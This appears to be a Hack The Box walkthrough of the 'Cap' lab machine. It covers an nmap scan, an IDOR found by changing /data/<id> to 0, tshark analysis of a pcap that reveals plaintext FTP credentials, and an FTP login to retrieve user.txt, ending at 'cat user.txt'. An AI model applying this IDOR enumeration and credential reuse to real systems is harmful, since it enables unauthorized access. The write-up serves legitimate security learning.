Title here
Summary here
HTB | Cap - Machines
Created: Apr 7, 2026
Last edited: Apr 7, 2026
Last edited: Apr 7, 2026
https://app.hackthebox.com/machines/Cap/
Cap | Walkthrough
| Phase |
|---|
| Reconnaissance |
| Foothold |
Reconnaissance
In initial phase is we have to use nmap to enumerate all open ports in the target machine
nmap -sC -sV <MACHINE-IP>
# or sudo nmap -sS <MACHINE-IP>nopedawn@npdn ~/L/H/S/Cap> nmap -sC -sV 10.129.19.17
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-07 09:17 WIB
Debugging Increased to 1.
NSE: Script scanning 10.129.19.17.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting ftp-bounce against 10.129.19.17:21.
NSE: Starting weblogic-t3-info against 10.129.19.17:80.
NSE: Starting sshv1 against 10.129.19.17:22.
NSE: Starting http-favicon against 10.129.19.17:80.
NSE: Starting vmware-version against 10.129.19.17:80.
NSE: Starting http-ls against 10.129.19.17:80.
NSE: Starting address-info against 10.129.19.17.
NSE: Finished address-info against 10.129.19.17.
NSE: Starting http-title against 10.129.19.17:80.
NSE: Starting http-webdav-scan against 10.129.19.17:80.
NSE: Starting http-svn-enum against 10.129.19.17:80.
NSE: Starting fingerprint-strings against 10.129.19.17:80.
NSE: [fingerprint-strings 10.129.19.17:80] FourOhFourRequest:>>>HTTP/1.0 404 NOT FOUND
Server: gunicorn
Date: Tue, 07 Apr 2026 02:17:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 232
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
<<<
NSE: [fingerprint-strings 10.129.19.17:80] GetRequest:>>>HTTP/1.0 200 OK
Server: gunicorn
Date: Tue, 07 Apr 2026 02:17:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19386
<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Security Dashboard</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
<link rel="stylesheet" href="/static/css/bootstrap.min.css">
<link rel="stylesheet" href="/static/css/font-awesome.min.css">
<link rel="stylesheet" href="/static/css/themify-icons.css">
<link rel="stylesheet" href="/static/css/metisMenu.css">
<link rel="stylesheet" href="/static/css/owl.carousel.min.css">
<link rel="stylesheet" href="/static/css/slicknav.min.css">
<!-- amchar<<<
NSE: [fingerprint-strings 10.129.19.17:80] HTTPOptions:>>>HTTP/1.0 200 OK
Server: gunicorn
Date: Tue, 07 Apr 2026 02:17:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Allow: GET, HEAD, OPTIONS
Content-Length: 0
<<<
NSE: [fingerprint-strings 10.129.19.17:80] RTSPRequest:>>>HTTP/1.1 400 Bad Request
Connection: close
Content-Type: text/html
Content-Length: 196
<html>
<head>
<title>Bad Request</title>
</head>
<body>
<h1><p>Bad Request</p></h1>
Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
</body>
</html>
<<<
NSE: [fingerprint-strings 10.129.19.17:80] SIPOptions:>>>HTTP/1.1 400 Bad Request
Connection: close
Content-Type: text/html
Content-Length: 195
<html>
<head>
<title>Bad Request</title>
</head>
<body>
<h1><p>Bad Request</p></h1>
Invalid HTTP Version 'Invalid HTTP Version: 'SIP/2.0''
</body>
</html>
<<<
NSE: Finished fingerprint-strings against 10.129.19.17:80.
NSE: Starting sslv2 against 10.129.19.17:21.
NSE: Starting http-ntlm-info against 10.129.19.17:80.
NSE: Starting http-cors against 10.129.19.17:80.
NSE: Starting http-git against 10.129.19.17:80.
NSE: Starting https-redirect against 10.129.19.17:80.
NSE: Finished https-redirect against 10.129.19.17:80.
NSE: Starting xmlrpc-methods against 10.129.19.17:80.
NSE: Starting ftp-syst against 10.129.19.17:21.
NSE: Starting ssh-hostkey against 10.129.19.17:22.
NSE: Starting http-svn-info against 10.129.19.17:80.
NSE: Starting http-trane-info against 10.129.19.17:80.
NSE: Starting ftp-anon against 10.129.19.17:21.
NSE: Starting http-auth against 10.129.19.17:80.
NSE: Starting hnap-info against 10.129.19.17:80.
NSE: Starting http-robots.txt against 10.129.19.17:80.
NSE: Starting http-cookie-flags against 10.129.19.17:80.
NSE: [http-cookie-flags 10.129.19.17:80] start check of /
NSE: Starting skypev2-version against 10.129.19.17:80.
NSE: Finished skypev2-version against 10.129.19.17:80.
NSE: Starting http-methods against 10.129.19.17:80.
NSE: Starting http-generator against 10.129.19.17:80.
NSE: Finished sshv1 against 10.129.19.17:22.
NSE: [sslv2 10.129.19.17:21] Can't connect using STARTTLS: FTP AUTH TLS error: Please login with USER and PASS.
NSE: Finished sslv2 against 10.129.19.17:21.
NSE: [ftp-bounce 10.129.19.17:21] Authentication rejected: 530 Login incorrect.
NSE: Finished ftp-bounce against 10.129.19.17:21.
NSE: Finished ftp-anon against 10.129.19.17:21.
NSE: Finished ftp-syst against 10.129.19.17:21.
NSE: Finished ssh-hostkey against 10.129.19.17:22.
NSE: Finished weblogic-t3-info against 10.129.19.17:80.
NSE: [vmware-version 10.129.19.17:80] Couldn't download file: /sdk
NSE: Finished vmware-version against 10.129.19.17:80.
NSE: [http-webdav-scan 10.129.19.17:80] Target isn't reporting WebDAV
NSE: [http-favicon 10.129.19.17:80] Got icon URL /static/images/icon/favicon.ico.
NSE: Finished http-ls against 10.129.19.17:80.
NSE: Finished http-title against 10.129.19.17:80.
NSE: Finished http-svn-enum against 10.129.19.17:80.
NSE: Finished http-ntlm-info against 10.129.19.17:80.
NSE: Finished http-git against 10.129.19.17:80.
NSE: Finished xmlrpc-methods against 10.129.19.17:80.
NSE: Finished http-svn-info against 10.129.19.17:80.
NSE: [http-trane-info 10.129.19.17:80] HTTP: Host returns proper 404 result.
NSE: [hnap-info 10.129.19.17:80] HTTP: Host returns proper 404 result.
NSE: Finished http-robots.txt against 10.129.19.17:80.
NSE: Finished http-webdav-scan against 10.129.19.17:80.
NSE: [http-methods 10.129.19.17:80] HTTP Status for OPTIONS is 200
NSE: [http-favicon 10.129.19.17:80] No favicon found.
NSE: Finished http-favicon against 10.129.19.17:80.
NSE: Finished hnap-info against 10.129.19.17:80.
NSE: [http-methods 10.129.19.17:80] Response Code to Random Method is 405
NSE: Finished http-trane-info against 10.129.19.17:80.
NSE: Finished http-auth against 10.129.19.17:80.
NSE: [http-cookie-flags 10.129.19.17:80] end check of / : 0 issues found
NSE: Finished http-cookie-flags against 10.129.19.17:80.
NSE: Finished http-generator against 10.129.19.17:80.
NSE: Finished http-methods against 10.129.19.17:80.
NSE: Finished http-cors against 10.129.19.17:80.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting rpc-grind against 10.129.19.17:80.
NSE: Starting tls-alpn against 10.129.19.17:21.
NSE: [tls-alpn 10.129.19.17:21] Connection to server failed: Previous STARTTLS attempt failed
NSE: [tls-alpn 10.129.19.17:21] Client hello failed with 15 protocols
NSE: Finished tls-alpn against 10.129.19.17:21.
NSE: Starting ssl-cert against 10.129.19.17:21.
NSE: Starting http-server-header against 10.129.19.17:80.
NSE: Starting tls-nextprotoneg against 10.129.19.17:21.
NSE: [tls-nextprotoneg 10.129.19.17:21] Connection to server failed: Previous STARTTLS attempt failed
NSE: Finished tls-nextprotoneg against 10.129.19.17:21.
NSE: Starting ssl-date against 10.129.19.17:21.
NSE: Finished ssl-date against 10.129.19.17:21.
NSE: Finished http-server-header against 10.129.19.17:80.
NSE: [ssl-cert 10.129.19.17:21] Specialized function error: Failed to connect to server: FTP AUTH TLS error: Please login with USER and PASS.
NSE: [ssl-cert 10.129.19.17:21] getCertificate error: Failed to connect to server
NSE: Finished ssl-cert against 10.129.19.17:21.
NSE: [rpc-grind 10.129.19.17:80] isRPC didn't receive response.
NSE: [rpc-grind 10.129.19.17:80] Target port 80 is not a RPC port.
NSE: Finished rpc-grind against 10.129.19.17:80.
NSE: Starting runlevel 3 (of 3) scan.
Nmap scan report for 10.129.19.17
Host is up (0.14s latency).
Scanned at 2026-04-07 09:17:20 WIB for 165s
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ssl-date:
|_ ERROR: Unable to obtain data from the target
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Tue, 07 Apr 2026 02:17:54 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Tue, 07 Apr 2026 02:17:47 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Tue, 07 Apr 2026 02:17:47 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
| </html>
| SIPOptions:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 195
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'SIP/2.0''
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/7%Time=69D4694B%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,103E,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
SF:ue,\x2007\x20Apr\x202026\x2002:17:47\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Tue,\x20
SF:07\x20Apr\x202026\x2002:17:47\x20GMT\r\nConnection:\x20close\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x20OPT
SF:IONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
SF:\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version:\x20'RTSP/
SF:1\.0''\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Tu
SF:e,\x2007\x20Apr\x202026\x2002:17:54\x20GMT\r\nConnection:\x20close\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(SIPOptions,12
SF:0,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nConten
SF:t-Type:\x20text/html\r\nContent-Length:\x20195\r\n\r\n<html>\n\x20\x20<
SF:head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n
SF:\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x2
SF:0\x20\x20Invalid\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version
SF::\x20'SIP/2\.0''\n\x20\x20</body>\n</html>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Final times for host: srtt: 140684 rttvar: 4719 to: 159560
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting runlevel 3 (of 3) scan.
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.23 secondsnopedawn@npdn ~/L/H/S/Cap> sudo nmap -sS 10.129.19.17
[sudo] password for nopedawn:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-07 09:22 WIB
Nmap scan report for 10.129.19.17
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.29 secondsAfter port-scanning, we got some bunch of junk output, the service is running in linux machine and there are three service opens in tcp
21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)80/tcp open http gunicorn
First thing first in http port 80, go visit the host 10.129.19.17 in browser, it look like a simple dashboard of security and network monitoring from linux server/vps
And from sidebar menu, Security snapshot Tab, there’s a download button to download network traffic packets, let’s try to see this packets inside, this time i’ll use tshark to analyze it.
Use this following command to show protocol hierarchy
nopedawn@npdn ~/L/H/S/Cap> tshark -r 2.pcap -qz io,phs
===================================================================
Protocol Hierarchy Statistics
Filter:
sll frames:11 bytes:646
ip frames:11 bytes:646
tcp frames:11 bytes:646
===================================================================It just some captured traffic of http protocol
Let’s back to dashboard, in IP Config Tab,
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.19.17 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb9:6015 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:6015 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:60:15 txqueuelen 1000 (Ethernet)
RX packets 5805 bytes 549389 (549.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5009 bytes 1399735 (1.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3084 bytes 242644 (242.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3084 bytes 242644 (242.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0That’s basically just output of ipconfig command from linux machine, and from the output we can see our ip address of this machine
And the last menu, in Network Status tab
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1001 37104 - off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 35108 - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 37019 - off (0.00/0/0)
tcp 0 1 10.129.19.17:57042 1.1.1.1:53 SYN_SENT 101 47323 - on (2.57/2/0)
tcp 0 0 10.129.19.17:80 10.10.17.182:63558 ESTABLISHED 1001 47324 - off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN 0 35999 - off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN 0 37021 - off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 35107 - off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* 0 32900 - off (0.00/0/0)
udp 0 0 127.0.0.1:54491 127.0.0.53:53 ESTABLISHED 102 47322 - off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 27430 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 27414 - @/org/kernel/linux/storage/multipathd
unix 3 [ ] DGRAM 27398 - /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 27401 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 27403 - /run/systemd/userdb/io.systemd.DynamicUser
unix 2 [ ACC ] STREAM LISTENING 27412 - /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 27415 - /run/systemd/journal/syslog
unix 7 [ ] DGRAM 27423 - /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 27425 - /run/systemd/journal/stdout
unix 8 [ ] DGRAM 27427 - /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 26517 - /run/systemd/journal/io.systemd.journal
unix 2 [ ACC ] STREAM LISTENING 32095 - /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 32136 - /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 32142 - /run/snapd.socket
unix 2 [ ACC ] STREAM LISTENING 32144 - /run/snapd-snap.socket
unix 2 [ ACC ] STREAM LISTENING 32146 - /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 33330 - /run/irqbalance//irqbalance1031.sock
unix 2 [ ACC ] STREAM LISTENING 32139 - @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ACC ] STREAM LISTENING 32140 - /var/snap/lxd/common/lxd/unix.socket
unix 2 [ ] DGRAM 26521 -
unix 3 [ ] STREAM CONNECTED 34548 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33002 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35995 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33003 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35560 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34506 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 34597 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 35067 -
unix 3 [ ] STREAM CONNECTED 32228 -
unix 3 [ ] DGRAM 27399 -
unix 3 [ ] STREAM CONNECTED 35069 -
unix 3 [ ] STREAM CONNECTED 35092 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 30720 -
unix 3 [ ] STREAM CONNECTED 35070 -
unix 3 [ ] STREAM CONNECTED 33331 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 31661 -
unix 3 [ ] STREAM CONNECTED 32297 -
unix 3 [ ] STREAM CONNECTED 28854 -
unix 3 [ ] DGRAM 27400 -
unix 3 [ ] STREAM CONNECTED 35014 -
unix 3 [ ] STREAM CONNECTED 32158 -
unix 3 [ ] STREAM CONNECTED 35994 -
unix 2 [ ] DGRAM 35640 -
unix 3 [ ] STREAM CONNECTED 35998 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 27976 -
unix 3 [ ] STREAM CONNECTED 34710 -
unix 3 [ ] STREAM CONNECTED 33249 -
unix 3 [ ] STREAM CONNECTED 34504 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 34501 -
unix 3 [ ] STREAM CONNECTED 31645 -
unix 3 [ ] STREAM CONNECTED 28996 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 30046 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33160 -
unix 2 [ ] DGRAM 35093 -
unix 3 [ ] STREAM CONNECTED 37009 -
unix 3 [ ] STREAM CONNECTED 35997 3217/sh
unix 3 [ ] DGRAM 28774 -
unix 3 [ ] STREAM CONNECTED 31311 -
unix 3 [ ] DGRAM 27982 -
unix 3 [ ] DGRAM 28773 -
unix 2 [ ] DGRAM 34477 -
unix 3 [ ] DGRAM 32978 -
unix 3 [ ] STREAM CONNECTED 32988 -
unix 3 [ ] STREAM CONNECTED 34438 -
unix 3 [ ] DGRAM 27984 -
unix 3 [ ] STREAM CONNECTED 28995 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34569 -
unix 3 [ ] STREAM CONNECTED 32987 -
unix 3 [ ] STREAM CONNECTED 34462 -
unix 2 [ ] DGRAM 27901 -
unix 3 [ ] DGRAM 32979 -
unix 3 [ ] STREAM CONNECTED 36280 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31648 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31646 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 27983 -
unix 3 [ ] STREAM CONNECTED 31312 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33251 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35105 -
unix 3 [ ] STREAM CONNECTED 34570 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33333 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35106 - /run/dbus/system_bus_socket
unix 3 [ ] DGRAM 32981 -
unix 2 [ ] DGRAM 37386 -
unix 3 [ ] STREAM CONNECTED 27866 -
unix 2 [ ] DGRAM 32976 -
unix 3 [ ] STREAM CONNECTED 33161 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 27981 -
unix 2 [ ] DGRAM 31807 -
unix 3 [ ] STREAM CONNECTED 35559 -
unix 3 [ ] STREAM CONNECTED 34503 -
unix 3 [ ] STREAM CONNECTED 34502 -
unix 3 [ ] STREAM CONNECTED 34505 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 28771 -
unix 3 [ ] STREAM CONNECTED 30045 -
unix 3 [ ] STREAM CONNECTED 34508 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33332 -
unix 3 [ ] DGRAM 32980 -
unix 2 [ ] DGRAM 34561 -It’s a netstat command
Notice the url argument came like this /data/2, it seems this URL isn’t sanitize by default and this can be lead to IDOR vulnerability
I’ve tried accessing each menu so many times, and noticed that the id parameter in URL increases every time we access each of these menus.
/data/<id>- Past:
/data/2 - Now:
/data/7
In the background seems like the dashboard is monitored and captured each we accessing the website and replacing into new id parameter
In some common IDOR cases the admin id is in 0 parameter, it often in ID 0, -1, or other low numbers refer to special objects.
I’ve tried to changing id into 0 as well and here’s I got from pcap file
nopedawn@npdn ~/L/H/S/Cap> tshark -r 0.pcap -qz io,phs
===================================================================
Protocol Hierarchy Statistics
Filter:
sll frames:72 bytes:8759
ip frames:72 bytes:8759
tcp frames:72 bytes:8759
http frames:6 bytes:4184
data-text-lines frames:3 bytes:2906
tcp.segments frames:3 bytes:2906
ftp frames:25 bytes:2017
ftp.current-working-directory frames:25 bytes:2017
===================================================================From protocol hierarchy output, there’s ftp packet captured, let’s try to show the packet
nopedawn@npdn ~/L/H/S/Cap> tshark -r 0.pcap -Y "ftp"
34 2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
36 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
38 4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
40 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
42 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
43 5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
45 5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
47 6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
49 6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
50 6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
51 6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
52 6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
54 7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
55 7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
56 7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
57 7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
58 7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
60 28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
61 28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
62 28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
63 28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
64 28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
65 28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
67 31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
68 31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.We can also get the raw clean output only to show the conversation using this following command
nopedawn@npdn ~/L/H/S/Cap> tshark -r 0.pcap -Y "ftp" -T fields -e ftp.request.command -e ftp.request.arg
USER nathan
PASS Buck3tH4TF0RM3!
SYST
PORT 192,168,196,1,212,140
LIST
PORT 192,168,196,1,212,141
LIST -al
TYPE I
PORT 192,168,196,1,212,143
RETR notes.txt
QUITAs we can see from the output there’s a credential leaked, seems like admin user credential for ftp and ssh service
nathan:Buck3tH4TF0RM3!
Foothold
The second phase is we have to accessing the service host using previous credential username and password
Use this following command
nopedawn@npdn ~/L/H/S/Cap> ftp 10.129.19.17
Connected to 10.129.19.17.
220 (vsFTPd 3.0.3)
Name (10.129.19.17:nopedawn): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>And it worked! Let’s try to show all files inside
ftp> dir
229 Entering Extended Passive Mode (|||49582|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Apr 07 02:17 user.txt
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||39172|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Apr 07 02:17 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||18119|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*****************************************************************| 33 0.52 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.09 KiB/s)
ftp>
nopedawn@npdn ~/L/H/S/Cap> cat user.txt
